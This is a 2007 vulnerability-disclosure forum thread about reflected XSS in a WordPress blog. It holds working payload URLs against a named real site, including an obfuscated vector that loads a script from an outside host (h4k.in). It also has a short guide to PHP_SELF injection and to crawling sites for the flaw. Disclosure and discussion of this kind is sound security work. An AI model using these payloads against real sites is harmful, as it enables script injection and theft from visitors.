Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Where you should disclose your vulnerabilities. Go read RFPolicy if you want to do responsible disclosure, and go here for when all else fails. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
WordPress XSS (works on ha.ckers)
Posted by: kane_666
Date: July 08, 2007 08:06AM

http://ha.ckers.org/blog/?"><script>alert(1)</script>

Click 'Previous Entries' and then it will fire... ;)

Options: ReplyQuote
Re: WordPress XSS (works on ha.ckers)
Posted by: Anonymous User
Date: July 08, 2007 08:18AM

Nice one! This way it works directly w/o user interaction:

http://ha.ckers.org/blog/?%22%3E%3Cscript%3Ealert(1)%3C/script%3E&paged=2

Greetings,
.mario

Options: ReplyQuote
Re: WordPress XSS (works on ha.ckers)
Posted by: kane_666
Date: July 08, 2007 08:22AM

Dam it... I was one-upped :P

...Can't believe i didn't think of doing that lol

Options: ReplyQuote
Re: WordPress XSS (works on ha.ckers)
Posted by: Anonymous User
Date: July 13, 2007 06:19PM

When will this be fiiiiiiiixed...

http://ha.ckers.org/blog/?%22%3E%3Cscript%3Ewith(location)with(hash)eval(substring(1))%3C/script%3E&paged=2#eval(String.fromCharCode(97,61,100,111,99,117,109,101,110,116,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,97,46,115,114,99,61,39,104,116,116,112,58,47,47,104,52,107,46,105,110,47,105,46,106,115,39,59,100,111,99,117,109,101,110,116,46,98,111,100,121,46,97,112,112,101,110,100,67,104,105,108,100,40,97,41,59%29%29

(of course it's not what it says - it's from kane and giorgio *g* )



Edited 2 time(s). Last edit at 07/13/2007 06:21PM by .mario.

Options: ReplyQuote
Re: WordPress XSS (works on ha.ckers)
Date: July 14, 2007 02:36AM

hehe, this is one of the most obvious ways to find XSS, especially in PHP applications and even more commonly found in wordpress templates.

the reason for these kind of bugs is due to the in appropriate use of PHP_SELF... Most people use PHP_SELF to find a relative path to a resource, or to find the path to the current script.

so how does PHP_SELF exploits work? well attach the payload after the URL. For example

http://example.com/"><script>alert(1)</script><!--

however this may not work due to reasons I don't want to discuss right now. I suggest to use the full path to the script, like this:

http://example.com/index.php/"><script>alert(1)</script><!--

according to my XSS sampling, this technique works almost 60% of the time. However, don't try it only on the index page. Almost every page could be vulnerable. Here is another example:

http://example.com/contact/contact.php/"><script>alert(1)</script><!--

cheers

Options: ReplyQuote
Re: WordPress XSS (works on ha.ckers)
Posted by: Anonymous User
Date: July 14, 2007 03:32AM

You're right, pdp. Plus it's easy to find - just crawl the page, attach the vector to the url and create an image instead of using an alert :) Or egrep your code /templates for superglobal fields related to the path/URI.

Options: ReplyQuote
Re: WordPress XSS (works on ha.ckers)
Posted by: kane_666
Date: July 14, 2007 07:10AM

Who's "giorgio *g*" ...? :S

And i'm quite surprised RSnake hasn't fixed this yet, he usually seems to be pretty quick when it comes to things like this :P

Options: ReplyQuote
Re: WordPress XSS (works on ha.ckers)
Posted by: ma1
Date: July 14, 2007 08:08AM

kane_666 Wrote:
-------------------------------------------------------
> Who's "giorgio *g*" ...? :S

guess it's me, nice 2 meet u in the same XSS :)

--
*hackademix.net*

There's a browser safer than Firefox... Firefox, with NoScript

Options: ReplyQuote
Re: WordPress XSS (works on ha.ckers)
Posted by: kane_666
Date: July 14, 2007 08:32AM

lol you found that XSS as well? Awesome :P

Great minds think alike ;)

Options: ReplyQuote
Re: WordPress XSS (works on ha.ckers)
Posted by: Anonymous User
Date: July 14, 2007 10:30AM

No - i meant the used vector. with()...

Options: ReplyQuote
Re: WordPress XSS (works on ha.ckers)
Posted by: kane_666
Date: July 14, 2007 10:39AM

Ahh... Alright, I'm up to date. ;)

Options: ReplyQuote
Re: WordPress XSS (works on ha.ckers)
Posted by: rsnake
Date: July 17, 2007 01:57PM

Sorry, I was out of town for two days with no access to email, or I would have followed up sooner. It should be fixed. Thanks for letting us know.

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote


Sorry, only registered users may post in this forum.